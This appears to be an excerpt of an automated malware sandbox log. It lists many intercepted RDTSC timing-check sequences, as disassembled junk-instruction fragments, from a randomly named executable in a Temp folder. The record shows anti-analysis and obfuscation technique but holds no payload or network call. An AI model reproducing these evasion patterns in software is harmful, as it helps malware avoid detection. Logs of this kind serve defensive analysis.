                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 5485DB second address: 5485E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 54A40F second address: 54A42F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp], eax 0x0000000a cmc 0x0000000b mov bl, C5h 0x0000000d push 00000000h 0x0000000f mov bx, 729Dh 0x00000013 push 00000000h 0x00000015 or dword ptr [ebp+122D39A8h], ebx 0x0000001b xchg eax, esi 0x0000001c pushad 0x0000001d push edi 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 54A42F second address: 54A43C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 jnc 00007F29F0CD5296h 0x0000000d rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 54A43C second address: 54A440 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 54B1AD second address: 54B201 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F29F0CD52A0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c mov ebx, dword ptr [ebp+122D2B77h] 0x00000012 push 00000000h 0x00000014 mov edi, dword ptr [ebp+122D2A2Fh] 0x0000001a push 00000000h 0x0000001c jmp 00007F29F0CD529Ch 0x00000021 push eax 0x00000022 jp 00007F29F0CD52C8h 0x00000028 push eax 0x00000029 push edx 0x0000002a jmp 00007F29F0CD52A8h 0x0000002f rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 54C1B1 second address: 54C1B5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 54C1B5 second address: 54C1BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 54D367 second address: 54D36B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 54D36B second address: 54D371 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 54D371 second address: 54D398 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 jmp 00007F29F0C52765h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edi 0x0000000f push eax 0x00000010 push edx 0x00000011 jnp 00007F29F0C52756h 0x00000017 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 54F108 second address: 54F132 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 ja 00007F29F0CD5296h 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f popad 0x00000010 push eax 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F29F0CD52A7h 0x00000018 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 55006D second address: 550071 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 550071 second address: 550075 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 550075 second address: 55007B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 55007B second address: 550080 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 550080 second address: 5500A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F29F0C5275Bh 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d pushad 0x0000000e pushad 0x0000000f jnp 00007F29F0C52756h 0x00000015 pushad 0x00000016 popad 0x00000017 popad 0x00000018 pushad 0x00000019 pushad 0x0000001a popad 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 54F394 second address: 54F399 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 5520E1 second address: 5520E5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 5520E5 second address: 552111 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 jmp 00007F29F0CD529Ah 0x0000000d push ecx 0x0000000e jmp 00007F29F0CD52A0h 0x00000013 pop ecx 0x00000014 push eax 0x00000015 push edx 0x00000016 je 00007F29F0CD5296h 0x0000001c rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 55278D second address: 552791 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 552791 second address: 5527A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push esi 0x0000000b jg 00007F29F0CD5296h 0x00000011 pop esi 0x00000012 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 554872 second address: 554898 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F29F0C52763h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jo 00007F29F0C52758h 0x0000000f pushad 0x00000010 popad 0x00000011 popad 0x00000012 push eax 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 554898 second address: 55489F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 552939 second address: 5529F2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F29F0C52763h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push esi 0x0000000a push edi 0x0000000b pop edi 0x0000000c pop esi 0x0000000d popad 0x0000000e push eax 0x0000000f jmp 00007F29F0C5275Bh 0x00000014 nop 0x00000015 jnc 00007F29F0C5275Ch 0x0000001b push dword ptr fs:[00000000h] 0x00000022 push 00000000h 0x00000024 push ebx 0x00000025 call 00007F29F0C52758h 0x0000002a pop ebx 0x0000002b mov dword ptr [esp+04h], ebx 0x0000002f add dword ptr [esp+04h], 00000017h 0x00000037 inc ebx 0x00000038 push ebx 0x00000039 ret 0x0000003a pop ebx 0x0000003b ret 0x0000003c mov dword ptr fs:[00000000h], esp 0x00000043 push eax 0x00000044 pop ebx 0x00000045 mov eax, dword ptr [ebp+122D0F61h] 0x0000004b call 00007F29F0C52765h 0x00000050 add dword ptr [ebp+122D1FC7h], eax 0x00000056 pop ebx 0x00000057 push FFFFFFFFh 0x00000059 push 00000000h 0x0000005b push esi 0x0000005c call 00007F29F0C52758h 0x00000061 pop esi 0x00000062 mov dword ptr [esp+04h], esi 0x00000066 add dword ptr [esp+04h], 00000016h 0x0000006e inc esi 0x0000006f push esi 0x00000070 ret 0x00000071 pop esi 0x00000072 ret 0x00000073 push eax 0x00000074 pushad 0x00000075 push eax 0x00000076 push edx 0x00000077 jmp 00007F29F0C5275Fh 0x0000007c rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 5529F2 second address: 552A25 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F29F0CD52A8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F29F0CD52A5h 0x00000010 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 553A70 second address: 553A75 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 5569D5 second address: 5569F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F29F0CD52A1h 0x00000009 popad 0x0000000a pop edx 0x0000000b push eax 0x0000000c pushad 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 555AEA second address: 555AEE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 555AEE second address: 555B00 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F29F0CD529Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 557954 second address: 557958 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 556AEC second address: 556AF1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 556AF1 second address: 556B12 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F29F0C52763h 0x00000013 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 556B12 second address: 556B18 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 556B18 second address: 556B1E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 556B1E second address: 556B22 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 55DC72 second address: 55DC76 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 55EF35 second address: 55EF86 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F29F0CD5296h 0x00000008 jmp 00007F29F0CD52A5h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jo 00007F29F0CD52ACh 0x00000015 jmp 00007F29F0CD52A6h 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007F29F0CD52A2h 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 55EF86 second address: 55EF8A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 5628FB second address: 562901 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 562153 second address: 56215E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F29F0C52756h 0x0000000a popad 0x0000000b rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 56215E second address: 562163 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 562163 second address: 56217B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop esi 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jmp 00007F29F0C5275Ah 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 56217B second address: 56217F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 56217F second address: 562183 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 562183 second address: 562189 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 5622D1 second address: 5622D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 566C49 second address: 566C6F instructions: 0x00000000 rdtsc 0x00000002 je 00007F29F0CD5296h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edi 0x0000000b push eax 0x0000000c jmp 00007F29F0CD529Dh 0x00000011 mov eax, dword ptr [esp+04h] 0x00000015 pushad 0x00000016 ja 00007F29F0CD529Ch 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 566C6F second address: 566CAE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F29F0C52768h 0x00000009 popad 0x0000000a mov eax, dword ptr [eax] 0x0000000c js 00007F29F0C52766h 0x00000012 jmp 00007F29F0C52760h 0x00000017 mov dword ptr [esp+04h], eax 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f push edi 0x00000020 pop edi 0x00000021 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 566CAE second address: 566CB8 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F29F0CD5296h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 566D5E second address: 566D76 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F29F0C5275Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [eax] 0x0000000c push eax 0x0000000d push edx 0x0000000e push esi 0x0000000f push edx 0x00000010 pop edx 0x00000011 pop esi 0x00000012 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 566D76 second address: 566D7C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 566D7C second address: 566D80 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 566D80 second address: 566D99 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F29F0CD529Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp+04h], eax 0x0000000f pushad 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 566D99 second address: 566DB9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F29F0C52767h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c push edi 0x0000000d pop edi 0x0000000e rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 56A248 second address: 56A255 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 push edx 0x00000006 pop edx 0x00000007 pop edi 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 56A255 second address: 56A2A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F29F0C52767h 0x0000000e pushad 0x0000000f jmp 00007F29F0C52761h 0x00000014 js 00007F29F0C52756h 0x0000001a jmp 00007F29F0C52766h 0x0000001f push ecx 0x00000020 pop ecx 0x00000021 popad 0x00000022 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 56DF3F second address: 56DF43 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 56DF43 second address: 56DF4D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 pushad 0x00000008 popad 0x00000009 pop ecx 0x0000000a rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 56DF4D second address: 56DF8F instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jmp 00007F29F0CD52A4h 0x00000008 pushad 0x00000009 popad 0x0000000a pop ebx 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push ecx 0x0000000e jmp 00007F29F0CD52A5h 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F29F0CD529Ch 0x0000001a push esi 0x0000001b pop esi 0x0000001c rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 56DF8F second address: 56DF93 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 56E633 second address: 56E639 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 56E639 second address: 56E655 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop ecx 0x00000006 jl 00007F29F0C5277Ah 0x0000000c jne 00007F29F0C5275Ch 0x00000012 jc 00007F29F0C52756h 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 56E655 second address: 56E659 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 56EAED second address: 56EAF2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 56EAF2 second address: 56EAF8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 56ED69 second address: 56ED6D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 56EEE7 second address: 56EF07 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F29F0CD52A6h 0x0000000d push eax 0x0000000e pop eax 0x0000000f rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 56EF07 second address: 56EF0B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 56EF0B second address: 56EF11 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 4F9143 second address: 4F914F instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jno 00007F29F0C52756h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 4F914F second address: 4F9158 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 pushad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 4F9158 second address: 4F916F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jnp 00007F29F0C52756h 0x0000000d jmp 00007F29F0C5275Ah 0x00000012 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 57A0DC second address: 57A0E8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push esi 0x00000009 pop esi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 57A0E8 second address: 57A0EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 57A227 second address: 57A24F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 jg 00007F29F0CD5296h 0x0000000e jmp 00007F29F0CD529Bh 0x00000013 pushad 0x00000014 popad 0x00000015 popad 0x00000016 pop edx 0x00000017 push edi 0x00000018 push eax 0x00000019 push edx 0x0000001a jg 00007F29F0CD5296h 0x00000020 push ecx 0x00000021 pop ecx 0x00000022 rdtsc
